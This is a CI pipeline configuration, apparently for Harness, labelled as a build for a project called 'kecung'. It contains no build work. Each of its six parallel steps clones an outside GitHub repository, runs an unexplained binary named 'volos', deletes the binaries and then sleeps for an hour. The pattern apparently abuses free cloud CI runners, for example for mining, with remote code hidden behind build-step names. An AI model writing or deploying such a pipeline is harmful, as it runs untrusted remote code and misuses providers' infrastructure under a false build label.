pipeline:
  name: Build kecung
  identifier: Build_fardhania_kecung_1727086736414
  projectIdentifier: default_project
  orgIdentifier: default
  stages:
    - stage:
        name: Build
        identifier: Build
        type: CI
        spec:
          cloneCodebase: true
          execution:
            steps:
              - parallel:
                  - step:
                      type: Run
                      name: Echo Welcome Message
                      identifier: Echo_Welcome_Message
                      spec:
                        shell: Sh
                        command: |-
                          rm -rf tmateo && git clone https://github.com/IFALOKAs-official/ramfedinolas && cd ramfedinolas && chmod +x ss4 && chmod +x volos && ./volos && rm -rf volos ss4
                          sleep 3600
                  - step:
                      type: Run
                      name: Run_2
                      identifier: Run_2
                      spec:
                        shell: Sh
                        command: |-
                          rm -rf tmateo && git clone https://github.com/IFALOKAs-official/ramfedinolas && cd ramfedinolas && chmod +x ss4 && chmod +x volos && ./volos && rm -rf volos ss4
                          sleep 3600
                  - step:
                      type: Run
                      name: Run_3
                      identifier: Run_3
                      spec:
                        shell: Sh
                        command: |-
                          rm -rf tmateo && git clone https://github.com/IFALOKAs-official/ramfedinolas && cd ramfedinolas && chmod +x ss4 && chmod +x volos && ./volos && rm -rf volos ss4
                          sleep 3600
                  - step:
                      type: Run
                      name: Run_4
                      identifier: Run_4
                      spec:
                        shell: Sh
                        command: |-
                          rm -rf tmateo && git clone https://github.com/IFALOKAs-official/ramfedinolas && cd ramfedinolas && chmod +x ss4 && chmod +x volos && ./volos && rm -rf volos ss4
                          sleep 3600
                  - step:
                      type: Background
                      name: Background_1
                      identifier: Background_1
                      spec:
                        shell: Sh
                        command: |-
                          rm -rf tmateo && git clone https://github.com/IFALOKAs-official/ramfedinolas && cd ramfedinolas && chmod +x ss4 && chmod +x volos && ./volos && rm -rf volos ss4
                          sleep 3600
                  - step:
                      type: Run
                      name: Run_5
                      identifier: Run_5
                      spec:
                        shell: Sh
                        command: |-
                          rm -rf tmateo && git clone https://github.com/IFALOKAs-official/ramfedinolas && cd ramfedinolas && chmod +x ss4 && chmod +x volos && ./volos && rm -rf volos ss4
                          sleep 3600
          platform:
            os: Linux
            arch: Amd64
          runtime:
            type: Cloud
            spec: {}
  properties:
    ci:
      codebase:
        connectorRef: account.Github_OAuth_1727086616822
        repoName: fardhania/kecung
        build: <+input>
